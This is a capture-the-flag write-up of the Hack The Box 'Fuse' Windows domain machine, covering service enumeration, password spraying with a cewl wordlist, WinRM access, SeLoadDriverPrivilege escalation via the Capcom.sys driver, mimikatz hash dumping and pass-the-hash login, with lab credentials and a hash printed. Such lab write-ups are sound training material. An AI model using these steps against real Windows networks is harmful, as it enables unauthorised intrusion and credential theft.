Hack The Box: Fuse machine write-up
Fuse was a Windows box that I found to be pretty complex despite it’s medium difficulty rating. It is mostly based on thorough enumeration on different services, like RPC and SMB, and then using password spraying to find valid credentials for the list of enumerated users. Once in, we quickly realise the privilege escalation is around a misconfigured permission which lets us load drivers and execute them as administrator.
Let’s dig in! The IP of the machine is
10.10.10.193 and, as always, I add
fuse.htb as an entry to my
/etc/hosts file .
I start by enumerating open ports to discover the services running in the machine. I fire up nmap:
Result of nmap scan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 # Nmap 7.80 scan initiated Sun Jul 5 18:39:18 2020 as: nmap -v -sV -sC -oA nmap/initial fuse.htb Nmap scan report for fuse.htb (10.10.10.193) Host is up (0.050s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-05 17:00:00Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=7/5%Time=5F020247%P=x86_64-pc-linux-gnu%r(DNSVe SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x SF:04bind\0\0\x10\0\x03"); Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h40m30s, deviation: 4h02m30s, median: 20m29s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Fuse | NetBIOS computer name: FUSE\x00 | Domain name: fabricorp.local | Forest name: fabricorp.local | FQDN: Fuse.fabricorp.local |_ System time: 2020-07-05T10:02:22-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-07-05T17:02:21 |_ start_date: 2020-07-05T15:39:41 Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jul 5 18:44:30 2020 -- 1 IP address (1 host up) scanned in 312.01 seconds
Quite a lot of ports open, amongst the most interesting ones 80 (HTTP), 135 (RPC), 389 / 3268 (LDAP) and 139 / 445 (SMB). I’ll start by checking out the web server.
Port 80 enumeration
When trying to access
fuse.htb on my browser I got an error, which was because the server is configured to redirect to
fuse.fabricorp.local. Therefore I just added
fuse.fabricorp.local to my
/etc/hosts file to point to the machine IP and could access it.
Interesting! There is PaperCut installed, so I started wandering around to see if there was anything interesting and found different usernames, which I added to a wordlist for later use. I called it
Enumerated users from different documents
users.txt file had then the following contents:
1 2 3 4 5 Administrator bhult sthompson tlavel pmerton
I had found users, okay, but where were the passwords? I ran some bruteforce scans but nothing. Then moved on and tried to enumerate LDAP to see if there was anything.
ldapsearch to enumerate the box.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ┌─[htb@parrot]─[~/htb/fuse] └──╼ $ ldapsearch -x -h 10.10.10.193 -p 389 -s base namingcontexts # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: namingcontexts # # dn: namingContexts: DC=fabricorp,DC=local namingContexts: CN=Configuration,DC=fabricorp,DC=local namingContexts: CN=Schema,CN=Configuration,DC=fabricorp,DC=local namingContexts: DC=DomainDnsZones,DC=fabricorp,DC=local namingContexts: DC=ForestDnsZones,DC=fabricorp,DC=local # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1
Then, I try to extract the information but no luck…
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌─[htb@parrot]─[~/htb/fuse] └──╼ $ ldapsearch -h 10.10.10.193 -p 389 -x -b "dc=fuse,dc=htb" # extended LDIF # # LDAPv3 # base <dc=fuse,dc=htb> with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A6C, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v3839 # numResponses: 1
I then tried with anonymous SMB login but no luck either.
1 2 3 4 5 6 7 8 9 ┌─[htb@parrot]─[~/htb/fuse] └──╼ $ smbclient -L //10.10.10.193 -N Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.193 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
Hmmmm, nothing came up so I went back to the web server.
PaperCut enumeration (more thorough)
I thought maybe the password was somewhere in the name of the documents or something so I decided to use
cewl to build a wordlist and do some password spraying with it on the different services:
1 cewl -d 5 -m 3 --with-numbers -w passwords.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm
The command can be broken down like this:
-d 5for a depth to spider the website of 5.
-m 3for a minimum word length of 3.
--with-numbersto include words that contain numbers, as passwords are usually alphanumeric.
SMB password spraying and enumeration
Once with the wordlist I used the tool
CrackMapExec (abbreviated as
cme in the binary) to bruteforce SMB:
Enumerating users in SMB
Good! We got two hits:
bhult; both using the same password:
Fabricorp01. However, the
NT_STATUS_PASSWORD_MUST_CHANGE is weird…
Password not working
I googled around and found that it’s possible to change the SMB password of a user remotely if we know the old password, good! We can do that with
1 smbpasswd -r 10.10.10.193 -U tlavel
And we are able to list shares!
Password changed and able to list shares
To quickly see everything I changed to
smbmap and used the recursive flag
Using smbmap to view all the files
However, I couldn’t find anything too juicy… I did note though that there was a lot of printer stuff there so it may turn out to be useful later.
I remembered that I hadn’t yet taken a look at this service because I didn’t have any working credentials, but now I did! The first thing I did when I got the prompt was use
enumprinters, as I had the printers stuff I had seen before fresh and thought there could be something. Then I checked if there were any more users. Turned out both assumptions were right!
RPC enumeration yields a password and more usernames
Finally a password:
$fab@s3Rv1ce$1! I added the users to my
users.txt and tried to use a password spraying attack once again on SMB:
svc-print:$fab@s3Rv1ce$1 was valid. However, no new information.
New valid credentials for SMB
WinRM: foothold into the system
After trying SMB with the new information I saw in
cme’s help menu the option to try with the
winrm service. I did and, to my surprise, the previous set of credentials worked!
CrackMapExec output on winrm
evil-winrm I got a shell and was able to read the user flag.
User shell and flag with evil-winrm
I started off using
whoami /all to get all the possible information about the user.
Information on the current user
Something thing was odd: one of the privileges enabled wasn’t normal:
1 SeChangeNotifyPrivilege Bypass traverse checking Enabled
We could have also used
whoami /privto just get the privileges
Another thing I noticed was a file called
readme.txt on the root of the filesystem which talks about some issue (in the end I didn’t use this information at all).
File containing hints (apparently)
I googled around and found a nice article (https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) that explained how it was possible to do a privilege escalation based on loading a driver from an unprivileged user account. One of the caveats of the exploit is that we need to choose a signed driver that has a vulnerability.
This and this other one repositories contain the necessary steps required for the exploitation. The first one contains the proof of concept for abusing SeLoadDriverPrivilege while the other one is a standalone exploit for a vulnerable feature in the driver Capcom.sys.
I compiled both and copied them to the system, ending up with the following files (
mimikatz.exe is for getting the NTLM Hash of the administrator afterwards).
Files moved to the system
Then, to execute the exploit we just need two commands:
.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
Commands to get a root shell
Then I used
mimikatz to get the hash of the administrator:
Getting NTLM hash of the administrator
If you’re wondering why, it was because evil-winrm offers the possibility of authenticating with a hash (aka a pass-the-hash attack), so we can run
evil-winrm -i 10.10.10.193 -u administrator -H '370ddcf45959b2293427baa70376e14e' and get an administrator shell!
Remote access as administrator using hash
This is everything, I hope you enjoyed the writeup and learned something new! If you liked it you can give me respect on Hack The Box through the following link: https://www.hackthebox.eu/home/users/profile/31531. Until next time!
Diego Bernal Adelantado